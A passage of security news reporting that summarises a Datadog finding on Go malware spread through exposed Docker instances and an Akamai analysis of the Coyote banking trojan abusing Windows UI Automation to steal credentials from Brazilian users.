“This multi-layered monetization also enhances resilience: even if the crypto miner is detected and removed, the proxy component may remain unnoticed, ensuring continued revenue for the threat actor.” Datadog said it also observed the threat actors abusing misconfigured Docker instances that are publicly accessible to spawn a new container, within which a malicious command is executed to fetch an additional payload from an external server and execute it. Written in Go, the modular malware comes fitted with capabilities to achieve persistence, conduct file system I/O operations, terminate processes, perform in-memory execution. It also serves as a dropper for GSocket and IPRoyal, and attempts to propagate to other systems via SSH brute-force attacks. “This demonstrates the threat actor’s willingness to compromise a diverse range of services – not just CMS providers – to achieve their objectives,” Datadog said.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New Coyote Malware Variant Exploits Windows UI Automation to Steal Banking Credentials

The Windows banking trojan known as Coyote has become the first known malware strain to exploit the Windows accessibility framework called UI Automation (UIA) to harvest sensitive information. “The new Coyote variant is targeting Brazilian users, and uses UIA to extract credentials linked to 75 banking institutes’ web addresses and cryptocurrency exchanges,” Akamai security researcher Tomer Peled said in an analysis. Coyote, first revealed by Kaspersky in 2024, is known for targeting Brazilian users. It comes with capabilities to log keystrokes, capture screenshots, and serve overlays on top of login pages associated with financial enterprises.

Part of the Microsoft .NET Framework, UIA is a legitimate feature offered by Microsoft to allow screen readers and other assistive technology products to programmatically access user interface (UI) elements on a desktop. That UIA can be a potential pathway for abuse, including data theft, was previously demonstrated as a proof-of-concept (PoC) by Akamai in December 2024, with the web infrastructure company noting that it could be used to steal credentials or execute code. In some ways, Coyote’s latest modus operandi mirrors the various Android banking trojans that have been spotted in the wild, which often weaponize the operating system’s accessibility services to obtain valuable data. Akamai’s analysis found that the malware invokes the GetForegroundWindow() Windows API in order to extract the active window’s title and compare it against a hard-coded list of web addresses belonging to targeted banks and cryptocurrency exchanges.

“If no match is found Coyote will then use UIA to parse through the UI child elements of the window in an attempt to identify browser tabs or address bars,” Peled explained. “The content of these UI elements will then be cross-referenced with the same list of addresses from the first comparison.” As many as 75 different financial institutions are targeted by the latest version of the malware, up from 73 documented by Fortinet FortiGuard Labs earlier this January. “Without UIA, parsing the sub-elements of another application is a nontrivial task,” Akamai added. “To be able to effectively read the contents of sub-elements within another application, a developer would need to have a very good understanding of how the specific target application is structured.” “Coyote can perform checks, regardless of whether the malware is online or operating in an offline mode.

This increases the chances of successfully identifying a victim’s bank or crypto exchange and stealing their credentials.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.